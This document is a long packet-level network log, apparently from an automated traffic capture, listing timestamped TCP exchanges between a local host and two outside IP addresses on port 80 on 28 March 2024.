                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903597116 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903606892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903613091 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903620005 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903634071 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903642893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903649092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903661013 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903690100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903740883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903753996 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903765917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903779030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903779030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903805017 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903829098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903938055 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903951883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903963089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903976917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903980970 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903989077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903994083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904011965 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904017925 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904026985 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904041052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904047012 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904056072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904072046 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904092073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904160976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904175043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904189110 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904202938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904223919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904223919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904233932 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904242039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904292107 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904301882 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904335022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904349089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904364109 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904381037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904392958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904392958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904396057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904411077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904422998 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904424906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904447079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904459953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904506922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904520988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904555082 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904658079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904673100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904686928 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904694080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904701948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904715061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904717922 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904728889 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904733896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904745102 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904757977 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904779911 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904916048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904931068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904942989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904956102 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904968023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904977083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904977083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.904985905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905004978 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905019999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905062914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905076981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905091047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905103922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905111074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905117989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905131102 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905134916 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905152082 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905170918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905276060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905291080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905297995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905313015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905320883 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905337095 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905344963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905535936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905550957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905566931 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905575037 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905575037 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905581951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905591965 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905596018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905610085 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905616045 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905641079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905672073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905687094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905699968 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905713081 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905720949 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905736923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905841112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905855894 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905878067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905885935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905899048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905903101 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905913115 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905920982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905936956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.905950069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906011105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906024933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906039000 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906053066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906063080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906063080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906071901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906089067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906107903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906202078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906215906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906228065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906241894 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906248093 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906271935 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906276941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906290054 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906296015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906303883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906311035 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906318903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906325102 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906332970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906342030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906349897 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906363010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906368971 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906400919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906419039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906435013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906449080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906462908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906474113 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906474113 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906488895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906510115 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906593084 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906605959 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906619072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906634092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906642914 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906650066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906662941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906666994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906677008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906682968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906692028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906703949 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906717062 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906732082 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906748056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906759977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906771898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906789064 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906809092 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906936884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906950951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906965971 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906979084 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906986952 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.906991005 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907006025 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907018900 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907032013 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907063007 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907063007 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907099009 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907113075 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907125950 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907141924 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907151937 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907155037 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907181025 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.907193899 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.958045006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.961199999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177608967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177632093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177644968 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177658081 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177675009 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177689075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177686930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177726030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.177735090 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178345919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178412914 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178716898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178730965 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178761959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178780079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178942919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178956985 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.178989887 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179003000 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179130077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179143906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179158926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179178953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179219961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179299116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179311991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179325104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179349899 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179387093 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179461956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179475069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179518938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179636002 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179650068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179698944 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179902077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179914951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.179959059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180071115 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180084944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180097103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180110931 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180114985 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180125952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180145025 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180186987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180345058 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180358887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180372953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180394888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180418015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180515051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180529118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180546045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180569887 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180597067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180778027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180790901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180805922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180819035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180860996 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180902958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180902958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180946112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.180963039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181014061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181139946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181145906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181153059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181165934 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181190968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181215048 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181382895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.181396008 CET8049718103.23.232.80192.168.2.6
